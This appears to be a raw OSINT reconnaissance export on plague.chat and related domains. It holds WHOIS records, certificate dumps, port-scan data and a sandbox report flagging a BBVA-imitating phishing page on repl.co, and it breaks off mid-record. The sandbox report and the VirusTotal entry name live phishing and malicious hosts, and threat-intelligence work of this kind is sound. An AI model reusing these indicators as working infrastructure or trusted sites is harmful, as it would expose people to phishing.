Abuse Contact Phone: +1.4153197517 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience. NOTICE: Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/ By submitting this query, you agree to abide by these terms. Register your domain name at https://www.cloudflare.com/registrar/ 2022-12-18 00:07:37 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:2c:cd:9b:50:65:02:e8:a9:66:93:11:97:33:8f:e3:ed:9b Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 28 16:20:05 2022 GMT Not After : Jan 26 16:20:04 2023 GMT Subject: CN=rasputain.fr Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:b2:a1:c1:c6:ef:3f:dd:a5:35:28:0d:b6:40:c0: 7f:e6:6f:1e:17:3e:0c:eb:77:fe:f8:2c:ca:65:83: f4:06:e2:b3:f2:d0:04:a9:7b:3f:b1:e2:22:f6:82: 47:d8:f4:6e:16:be:b2:4c:e3:70:7b:92:25:7b:4d: 16:d8:29:cc:7a ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: B5:39:17:8F:F2:F1:09:24:68:7D:38:74:CE:49:91:59:BB:E6:BC:C3 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:rasputain.fr X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 87:68:75:02:ec:0e:13:5e:47:00:4f:2e:7c:82:da:4e:a0:27: 70:84:e6:08:d5:5f:ca:11:39:8b:bc:89:e4:53:77:6b:ac:e7: e7:8f:09:2e:01:2a:23:ef:6b:30:a4:01:0c:bd:a3:7f:b7:ca: 83:94:56:ac:25:05:62:89:5c:35:fc:32:04:91:ab:d9:a9:3e: 3e:82:d9:03:2a:25:e9:e1:c0:6e:9f:c2:5f:2b:eb:15:61:ed: ff:a3:97:ef:78:fb:69:ef:ca:32:97:80:05:c8:e1:f2:42:a2: 89:65:15:04:70:0f:9c:14:c0:bb:14:96:c5:48:53:bf:4d:0c: 19:9b:1e:fc:72:81:fd:73:b4:d6:39:c0:64:db:90:a2:de:f2: a2:c2:28:62:72:e9:f6:6e:ef:f7:73:97:33:3e:31:dc:d7:4e: 64:75:f3:60:ee:00:e6:13:f0:a1:28:9a:10:ff:a8:8f:ab:90: 63:6b:ec:dc:05:3b:eb:7a:c5:64:de:4c:24:96:f8:bc:96:30: d4:80:98:4c:24:c6:ce:47:16:1f:6a:95:8b:23:24:49:eb:a1: 47:1b:27:fe:6a:46:f9:ed:8d:c6:99:aa:48:27:e7:ec:9b:0b: 69:8e:9f:f4:06:55:e3:4d:0e:cb:e3:2b:c1:60:45:b3:47:1b: 07:e8:94:43 rasputain.fr 2022-12-18 00:09:39 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731cbe0777147f6cea56397bac24549c58b12f30b67494e1fc1', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'0', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.nikkdersmehitra.tk', u'nikkdersmehitra.tk'], u'cn': u'*.nikkdersmehitra.tk', u'valid': True, u'not_after': u'2023-02-02T12:44:01Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'31607e5380e2aec5929a44f205580aa911a8623d1c3780d24fa379f919553493', u'key_algo': u'ECDSA', u'not_before': u'2022-11-04T12:44:02Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'nikkdersmehitra.tk', u'summary': u'Date: Fri, 04 Nov 2022 13:56:39 GMT\r\nContent-Length: 0\r\nConnection: close\r\nCache-Control: no-store, no-cache\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=aVBjIeLJcOh7qYTnv%2B4mWBSydqij68vV2vgFTG%2FER5BoPwcTt%2FuGT0cFsW06ghJGyRS3y2BqQde8cUaicVGPEJ4iv3Zh7sNe8BQ5J0GFpiR52ehFLiGsUdkA9Hd2otivID%2FWVxA%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764ddab50b5b75c0-LHR\r\nalt-svc: h3=":8443"; ma=86400, h3-29=":8443"; ma=86400\r\n\n\n', u'time': u'2022-11-04T13:56:39.688578813Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf13c54319aa7eb0c7d8199ba6b6', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.chabneuressi.ml', u'sni.cloudflaressl.com', u'chabneuressi.ml'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-05-10T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'213922f4d95f82dcc7775f3a8b9b211abceffa7cc4d39a5ad7882daea5a0ff6b', u'key_algo': u'ECDSA', u'not_before': u'2022-05-11T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'chabneuressi.ml', u'summary': u'Date: Fri, 04 Nov 2022 13:55:48 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0\r\nExpires: 0\r\nLast-Modified: Fri, 04 Nov 2022 13:55:48 GMT\r\nPragma: no-cache\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=pV4dufhETnS50h2jxXa05fupCaXjMrEkspcn0fB5%2Bd671p5hpV7v9uc6runBLinatI2LHC50A97XdgCUgY3cX5%2Fnd9TrTGcEiGJCBTkk%2B5wMXe0CK4MzGeej6C2vbZk02GM%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dd972af41bbbb-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\nd\r\n404 Not Found\r\n0\r\n\r\n', u'time': u'2022-11-04T13:55:48.105852197Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b95f98ee4527aeab6c10d1f71c702768ceb5fb98112a1fe3', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'location': u'https://pokerdomofficial.gold/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.pokerdomofficial.wtf', u'pokerdomofficial.wtf'], u'cn': u'*.pokerdomofficial.wtf', u'valid': True, u'not_after': u'2023-01-29T12:44:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'2d63a873bbe07a74a2bbd90fbaa2844307b97f7395feb07eb317914dee22c5c7', u'key_algo': u'ECDSA', u'not_before': u'2022-10-31T12:44:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'www.pokerdomofficial.wtf', u'summary': u'Date: Fri, 04 Nov 2022 13:55:05 GMT\r\nContent-Type: text/html; charset=iso-8859-1\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nLocation: https://pokerdomofficial.gold/\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gacXtCN5nhXvtXx%2BZaMTvJgSyJKyhNbIOzsB2qIa2uXIoWfXDgJuv%2Bq3T5xD2Mdk96ScN0GWF43DdniR1Y7V%2FHpY%2Bezn19CFvPzCIW33B9dXH5nZEdOzlQ5kX%2BPbMtMnUjWlcOMq0AuXauY%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dd8662fbb8ce9-EWR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 301 Moved Permanently\n\nee\r\n\n\n301 Moved Permanently\n\n

Moved Permanently

\n

The document has moved here.

\n\n\r\n0\r\n\r\n', u'time': u'2022-11-04T13:55:05.022670051Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc77c81ddeb484ca1d73deb3f13a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'location': u'https://nflmug.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'nflmug.com', u'summary': u'Date: Fri, 04 Nov 188.114.97.9 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77aff5a53c0f6928-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 1 0 1 0 None https://misogyny.wtf/api/v2/sendtk misogyny.wtf 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.182 34.149.204.188 2022-12-18 00:21:34 BGP AS Membership No Censys 0 0 2 0 None 13335 104.21.19.243 2022-12-18 00:31:01 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.chat Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://dynadot.com Updated Date: 2022-12-08T01:32:43Z Creation Date: 2020-01-31T13:24:11Z Registry Expiry Date: 2023-01-31T13:24:11Z Registrar: Dynadot, LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: California Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: PLAGUE.CHAT Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://www.dynadot.com Updated Date: 2022-01-03T14:24:39.0Z Creation Date: 2020-01-31T13:24:11.0Z Registrar Registration Expiration Date: 2023-01-31T13:24:11.0Z Registrar: DYNADOT LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited Registry Registrant ID: CPF-103775 Registrant Name: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Registrant Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Admin ID: CPF-103775 Admin Name: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Admin Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Tech ID: CPF-103775 Tech Name: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Tech Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-01-03 06:24:39 -0800 <<< plague.chat 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None attikosilios.gr 172.67.147.230 2022-12-18 00:11:53 Physical Location No ipapi.co 1 0 1 0 None Amsterdam, North Holland, NH, Netherlands, NL 137.117.157.128 2022-12-18 00:31:48 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.place plague.fun 2022-12-18 00:19:33 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [20.226.83.185] https://www.virustotal.com/en/ip-address/20.226.83.185/information/ 20.226.83.185 2022-12-18 00:22:07 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} 34.149.204.188 2022-12-18 00:05:58 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:08:aa:47:53:40:59:b8:a3:96:dc:96:87:a9:7a:35:d6:08 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 1 17:51:42 2022 GMT Not After : Nov 30 17:51:41 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:6b:d4:77:ba:7c:58:74:d4:f7:62:3e:a5:9e:fa: e4:b2:ad:38:11:67:f4:2c:6b:e2:4b:cf:d7:47:ec: bc:44:40:93:e0:b5:59:3b:36:a9:57:77:9f:e2:6e: a1:bf:09:57:5c:e1:38:9b:5d:d2:fd:8a:b1:b3:72: 69:72:d1:bd:91 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EF:B8:30:CC:B8:73:D9:84:B0:36:57:51:D0:94:4A:9E:35:F7:78:1B X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:0a:e1:e9:23:58:c5:5f:50:51:3a:97:6b:4b:b8: 6c:48:89:2e:66:74:25:17:55:d0:cb:44:44:34:88:8c:e4:0f: a8:1a:9a:08:8d:8f:86:39:72:ce:5f:b1:d9:6f:03:b7:02:31: 00:d1:f2:c2:c9:76:cf:0c:5f:07:03:d2:2c:94:c4:a4:70:f1: 03:d1:8f:78:8a:05:22:da:d2:44:5e:4f:72:4f:1d:c1:78:0e: 9f:81:c9:b6:22:66:b7:7a:6d:52:79:50:3f 2022-12-18 00:20:17 Netblock Membership No RIPE 16 0 3 0 None 195.110.124.0/24 195.110.124.246 2022-12-18 00:07:03 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://frances.hombanking.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fb8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fb8_IESQMMUTEX_0_303"\n "IsoScope_fb8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4024"\n "IsoScope_fb8_ConnHashTable<4024>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_fb8_IESQMMUTEX_0_331"\n "IsoScope_fb8_IE_EarlyTabStart_0xeac_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "209.197.3.8:80"\n "45.238.212.216:443"\n "69.192.18.182:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC0BA.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bbva.com.ar"\n "frances.hombanking.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "W05YX9G3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W05YX9G3.txt]- [targetUID: 00000000-00003028]\n Dropped file: "H4T1U159.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H4T1U159.txt]- [targetUID: 00000000-00003028]\n Dropped file: "NA01GQNY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NA01GQNY.txt]- [targetUID: 00000000-00004024]\n Dropped file: "8FUQ10PO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8FUQ10PO.txt]- [targetUID: 00000000-00003028]\n Dropped file: "SBLNSM9V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBLNSM9V.txt]- [targetUID: 00000000-00004024]\n Dropped file: "8VQ1VJED.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8VQ1VJED.txt]- [targetUID: 00000000-00003028]\n Dropped file: "G2TB019O.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G2TB019O.txt]- [targetUID: 00000000-00003028]\n Dropped file: "KGNCU8EK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KGNCU8EK.txt]- [targetUID: 00000000-00003028]\n Dropped file: "525F4STS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\525F4STS.txt]- [targetUID: 00000000-00004024]\n Dropped file: "1EVI5CBM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1EVI5CBM.txt]- [targetUID: 